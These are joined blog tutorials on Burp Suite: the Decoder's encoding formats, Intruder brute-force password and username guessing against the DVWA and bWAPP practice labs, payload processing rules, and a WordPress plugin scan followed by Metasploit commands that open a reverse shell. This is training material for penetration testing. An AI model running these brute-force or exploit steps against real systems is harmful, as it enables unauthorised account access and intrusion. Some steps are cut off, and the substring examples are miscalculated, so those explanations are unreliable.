Today we are discussing about the Decoder Option of ‘Burp Suite’. Burp Suite is a tool which is used for testing Web application security. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities. This tool is written in JAVA and is developed by PortSwigger Security.

There are 9 types of decoder format in Burp Suite:

• Plain text
• URL
• HTML
• Base64
• ASCII Hex
• Hex
• Octal
• Binary
• Gzip

URL Encoder & Decoder

When you will explore decoder option in burp suite you will observe two section left and right. The left section is further divided in two and three section for encode and decode option respectively. The right section contains function tab for encode and decode option. And if you will observe given below image you can notice there is two radio buttons for selecting type of content you want to encode or decode.

Enable the radio button for text option and then we can give any input in the box to be encoded, here we have given Raj chandel as an input as shown in the image. After that click on the Encoded as option and select URL field from given list as shown in the image. We will get the encoded result in URL format in the second box as shown in the image.

 We can directly decode the Encoded URL Text by clicking on the Decoded as option and selecting URL field from given list of options as shown in the image.  This will decode the encoded URL text into plain text in the third box as shown in the image.

HTML Encoder & Decoder

Repeat the same and give any input in the first box to be encoded, here we have given Raj chandel as an input as shown in the image. After that click on the Encoded as option and select HTML field as shown in the image. We will get the encoded result in HTML format in the second box as shown in the image.

We can directly decode the Encoded HTML Text by clicking on the Decoded as option and selecting HTML field as shown in the image.  This will decode the encoded HTML text into plain text in the third box as shown in the image.

Base64 Encoder & Decoder

Repeat the same process and give any input in the first box to be encoded, here we have given Raj chandel as an input as shown in the image. After that click on the Encoded as option and select Base64 field as shown in the image. We will get the encoded result in Base64 format in the second box as shown in the image.

We can directly decode the Encoded Base64 Text by clicking on the Decoded as option and selecting Base64 field as shown in the image.  This will decode the encoded Base64 text into plain text in the third box as shown in the image.

ASCII Hex Encoder & Decoder

Again repeat the same process and give any input in the first box to be encoded, here we have given Raj chandel as an input as shown in the image. After that click on the Encoded as option and select ASCII Hex field as shown in the image. We will get the encoded result in ASCII Hex format in the second box as shown in the image.

We can directly decode the Encoded ASCII Hex Text by clicking on the Decoded as option and selecting ASCII Hex field as shown in the image.  This will decode the encoded ASCII Hex text into plain text in the third box as shown in the image.

Hex Encoder & Decoder

Repeat same as above and give any input in the first box to be encoded, here we have given Raj chandel 123456789 as an input as shown in the image. After that click on the Encoded as option and select Hex option as shown in the image. We will get the encoded result in Hex format in the second box as shown in the image.

We can directly decode the Encoded Hex Text by clicking on the Decoded as option and selecting Hex field as shown in the image.  This will decode the encoded Hex text into plain text in the third box as shown in the image.

Octal Encoder & Decoder

Repeat again and give any input in the first box to be encoded, here we have given Raj chandel 123456789 as an input as shown in the image. After that click on the Encoded as option and select Octal field as shown in the image. We will get the encoded result in Octal format in the second box as shown in the image.

We can directly decode the Encoded Octal Text by clicking on the Decoded as option and selecting Octal field as shown in the image.  This will decode the encoded Octal text into plain text in the third box as shown in the image.

Binary Encoder & Decoder

Repeat the same and give any input in the first box to be encoded, here we have given Raj chandel 123456789 as an input as shown in the image. After that click on the Encoded as option and select Binary field as shown in the image. We will get the encoded result in Binary format in the second box as shown in the image.

We can directly decode the Encoded Binary Text by clicking on the Decoded as option and selecting Binary field as shown in the image.  This will decode the encoded Binary text into plain text in the third box as shown in the image.

Gzip Encoder & Decoder

Give any input in the first box to be encoded, here we have given Raj chandel as an input as shown in the image. After that click on the Encoded as option and select Gzip field as shown in the image. We will get the encoded result in Gzip format in the second box as shown in the image.

We can directly decode the Encoded Gzip Text by clicking on the Decoded as option and selecting Gzip field as shown in the image.  This will decode the encoded Gzip text into plain text in the third box as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Burpsuite Encoder & Decoder Tutorial appeared first on Hacking Articles.

Hello Friends!!  In our previous article part1 we had discussed how to perform brute force attack on any web application server for making unauthorized login into it using some Payload of Burpsuite. In part 2 articles you will learn more about brute force attack with help of remaining BurpSuite payloads that might be helpful in other situation.

Let’s Start!!

Character Substitution

This type of payload allows to configure a list of strings and apply various character substitutions to each item. This type of payload is useful in password guessing attacks and generating common variations on dictionary words.

The UI of this payload allows you to configure a number of character substitutions. For each item, it will generate a number of payloads, which include all permutations of substituted characters according to the defined substitutions.

 For example, the default substitution rules states (which include e > 4 and r > 5), the item “Raj Chandel” will generate the following payloads:

raj chandel

5aj chandel

raj chand4l

5aj chand4l

First, we have intercepted the request of the login page in the DVWA LAB, where we have given a default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as

• In the given below image we have selected password that means we will need one dictionary files for password.

 Now click on payloads option after selecting payload position. Here we can add a dictionary by clicking on Load option or we can manually add Strings by clicking on the Add option.

Now we have substituted 4>a , 5>s , 9>o as per our requirements to match the password and we have added the input as p445w9rd using the Add option which will substitute the character’s according to the Defined substitution as shown in the image.

Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password and will give you the correct password. The moment it will find the correct value, it will change the value of length as shown.

 And to confirm the password matched, we will give the matched password in the DVWA LAB login page. We will see a message “Welcome to the password protected area admin” which shows are success in the character substitution payload attack.

Copy Other Payload

This is a type of payload which can copy the value of the current payload to another payload position. It is very useful for attack types that have multiple payload sets such as cluster bomb, pitch fork and battering ram. This payload type can be useful in various situations, for example:

• Suppose we are using two different parameters and we want to attack at two different fields, therefore we can set different “payload types” at multiple “payload sets” inside burpsuite payload configuration as per our attack type as it allows us to simply use the same dictionary for both payload that we have set at particular position by giving the position of the payload we want to copy. It will execute the complete payload which is set at a specific position.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given wrong username and password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted username and password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack which is the username and password and click on Add button.
• Choose the Attack type as Cluster Bomb.
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Now click on payloads option after selecting payload position, here we need to add a dictionary which will use for both payload set. Then select the Payload type as Simple list for Payload Set ‘1’ which will attack at the username field.

Now  to attack at the password field we will select Payload type as Copy other payload for Payload Set ‘2’ because we want to attack the same payload type at payload set 2 which will copy the dictionary given for payload set 1 to attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the username and password which will give you the correct username and password. The moment it will find the correct value, it will change the value of length as shown in the image.

And to confirm the password matched, you can give the matched password in the BWAPP LAB login page.

Username Generator

This type of payload allows you to set up a list of names or email addresses, and can produce usernames from given specific schemes.

For example, Let’s take a username “raj chandel” which can give results in up to 115 possible usernames, some combination are as follows :

rajchandel

raj.chandel

chandelraj

chandel.raj

chandel

raj

rajc

etc…

This type of payload is useful to target at a specific user, where you do not know the username or email address scheme of the user which is being used in a specific application.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given wrong username and password. Then click on login , the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted username and password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack which is the username and password and click on Add button.
• Choose the Attack type as Cluster Bomb.
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the Payload type as “Username Generator” for Payload Set ‘1’ which will attack at the username field, we have a given input string “raj chandel” by using the Add option as shown in the image, which will use different permutations on that input string given to match the correct username.

Now to attack at the password field we will select Payload type as Simple list for Payload Set ‘2’ for which we have added a dictionary manually created by us by using the Load option.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the username and password which will give you the correct username and password. The moment it will find the correct value, it will change the value of length as shown in the image.

Dates

This type of payload generates date payloads within a given range and in a specified format. This type of payload is can be used in data mining or brute forcing.

For example it can be used to guess a user’s birth date, wedding date, anniversary date etc which can be used to brute force the security questions for an application or web applications, or it can used to brute force the password of user’s, where user’s uses dates as their password.

The following options are available in this type of payload:

• From – This is said as the first date which will be generated.
• To – This is said as the last date which will be generated.
• Step – This is said as an increase between sequential dates, days, weeks, months or years. It should be a positive value.
• Format – This is said as the format in which dates can be represented. we can select from different predefined date formats, or we can make our own custom date format as per our requirement. Some example of the date format are given below:

Repeat the same to intercept the request of the login page in the Bwapp LAB, where we have given wrong username and password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted username and password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack which is the username and password and click on Add button.
• Choose the Attack type as Cluster Bomb.
• In the given below image we have selected username and password that means we will need two dictionary files i.e. one for username and second for password.

Then select the Payload type as Simple list for Payload Set ‘1’ which will attack at the username field where we have given a dictionary as an input string as shown in given below image.

Now to attack at the password field we will select Payload type as Dates for Payload Set ‘2’ because we are guessing the user might have its birth date or any other date as a password.

After this we have set the inputs for Payload set ‘2’ in the fields given in the payload options such as FROM, TO, STEP and FORMAT as shown in the image.

Now Select Start Attack in the Intruder menu for brute force attack.

Sit back and relax because now the burp suite will do its work, match the username and password which will give you the correct username and password. The moment it will find the correct value, it will change the value of length as shown in the image.

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology.

The post Beginners Guide to Burpsuite Payloads (Part 2) appeared first on Hacking Articles.

Burp_wp is an extension of burpsuite used to scan and find vulnerabilities in wordpress plugins and themes using burpsuite proxy. It was created by Kacper Szurek and can be downloaded from here.

Let’s begin

To run this extension we first need to install jython. Jython is an implementation of python programming that can run on java platform. You can download jython from here.

Now we download jython to burpsuite. We go to the python Environment and locate the jar file.

Now we go to extender, and select extensions tab to add the burp_wp extension.

We click on Add, a pop up will come. We select python as extension type and give the location at which the burp_wp file is located. We select “show in UI” for standard output and error to get any error if any occur.

As soon as the extension get installed we get the message in the image below that shows it was installed successfully.

Now we get a new “Burp WP” tab. Burp_WP automatically updates the first time it gets installed. It downloads the list of vulnerable plugins and theme from the database of WPscan.

Now we intercept the request of the website we want to scan for vulnerabilities.

As soon as we forward the request we go to Burp WP tab and we can find all the vulnerable plugins and themes on the website. We will get all vulnerable plugins and themes as we go through the site.

Now we use metasploit to exploit this vulnerability.

msf > use exploit/unix/webapp/wp_nmediawebsite_file_upload

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > set rhost 192.168.1.143

msf exploit(unix/webapp/wp_nmediawebsite_file_upload) > run

As soon as we run this exploit we get the reverse shell.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post WordPress Exploitation using Burpsuite (Burp_wp Plugin) appeared first on Hacking Articles.

Hello friends!! Today we are going to discuss “Payload Processing” option of Burpsuite which is advance functionality comes under Intruder Tab for making brute force attack.

Payload Processing

Payload Processing can be defined as when payloads are generated using payload types, they can be further manipulated or filtered using various processing rules and payload encoding.

Payload Processing Rules

These rules are defined to perform various processing task on each payload before it is used. These rules are executed in a sequence, and they can be used to help debug any problem with the configuration. Payload processing rules are useful in situations where you need to generate different payloads, or where we want to wrap payloads within a wider structure or encoding scheme.

There are 12 types of payload processing rules available:

• Add prefix
• Add suffix
• Match / Replace
• Substring
• Reverse substring
• Modify case
• Encode  
• Decode
• Hash
• Add raw payload
• Skip if matches regex
• Invoke Burp extension

Let’s start!!

Add Prefix

This processing rule adds up a prefix before the payload.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

 Before executing the attack we have added a payload processing rule to the payload type which is Add Prefix and we have given an input string “hash” which is added as a prefix with every input strings in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

And to confirm the password matched, we will give the password in the Bwapp LAB login page, which will successfully log us into the Bwapp lab. This shows our success in the attack as shown in the image.

Add Suffix

This processing rule adds up a suffix after the payload.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as

• In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Add Suffix and we have given an input string “1234” which is added as a suffix with every input strings in the dictionary, as shown in the result window of the attack.

Select Start Attack in the Intruder menu as shown in the image.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Match / Replace

This processing rule is used to replace any part of the payload that match a specific regular expression, with a string.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as

• In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. We can either load the dictionary or we can manually add input strings using the Add button in the payload options as shown in the image.

Before executing the attack we have added a payload processing rule to the payload type which is Match / Replace and we have given an input “9870” in the Match Regex which will match the input given with the input strings in the dictionary, if the there is a certain match than it will replace it with the input “1234” given in the Replace with as shown in the image.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Substring

This processing rule is used to extracts a sub-portion of the payload, starting from a specified offset up to a specified length. Here the offset and length are counted from the front.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as

• In the given below image we have selected password that means we will need one dictionary files for password.

Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. Here we had added dictionary using option “Add from list” as shown below in given image.

Before executing the attack we have added a payload processing rule to the payload type which is Substring and we have given an input “0” in From option which specifies the offset and a input “3” in the Length option which specifies the length of the input strings.

For example if “password” is word in dictionary and we had applied above filter so it will place alphabet p = 0; a = 1; s = 2 and s = 3 hence it will read only pass from whole word “password”.

The length specified will select only those inputs having the specific length and other lower or greater length inputs are discarded as shown in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Reverse Substring

This processing rule is used as a substring rule, but the end offset is specified counting backwards from the end of the payload, and the length is counted backwards from the end offset.

First, we have intercepted the request of the login page in the Bwapp LAB, where we have given default username and wrong password. Then click on login, the burp suite will capture the request of the login page in the intercept tab.

Send the captured request to the Intruder by clicking on the Action Tab and follow given below step. Now open the Intruder tab then select Positions tab and you can observe the highlighted password and follow the given below step for selecting payload position.

• Press on the Clear button given at right of window frame.
• Now we will select the fields where we want to attack and i.e. the password filed and click on Add button.
• Choose the Attack type as sniper

• In the given below image we have selected password that means we will need one dictionary files for password.

 Now click on payloads option after selecting payload position. Then select the Payload type as Simple list, where we have added a dictionary by clicking on Load button. Here we had added dictionary using option “Add from list” as shown below in given image.

Before executing the attack we have added a payload processing rule to the payload type which is Reverse Substring and we have given an input “2” in From option which specifies the offset and an input “9” in the Length option which specifies the length of the input strings and they are similar to the Substring rule but it works from backwards of a offset and the length is counted backwards where the offset ends.

For example if “admin123456” is word in dictionary and we had applied above filter so it will place alphabet 4 = 0; 3 = 1 ; 2 = 2 ; 1 = 3 ; n = 4 ; i = 5 ; m = 6 ; d = 7 ; d = 8 ; a = 9  hence it will read  only ‘admin1234’ from whole word “admin123456”.

The length specified will select only those inputs having the specific length and other lower or greater length inputs are discarded as shown in the result window of the attack.

Select Start Attack in the Intruder menu.

Sit back and relax because now the burp suite will do its work, match the password which will give you the correct password. The moment it will find the correct value, it will change the value of length as shown in the image.

Use this combination of username and password for login to verify your brute force attack for correct password.

Modify Case

This processing rule can be used to modify the case of the payload, if needed. This rule has the same options available for the Case Modification payload type which we have explained in Part-1 of the Payload types article.

Source: portswigger.net

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Payload Processing Rule in Burp suite (Part 1) appeared first on Hacking Articles.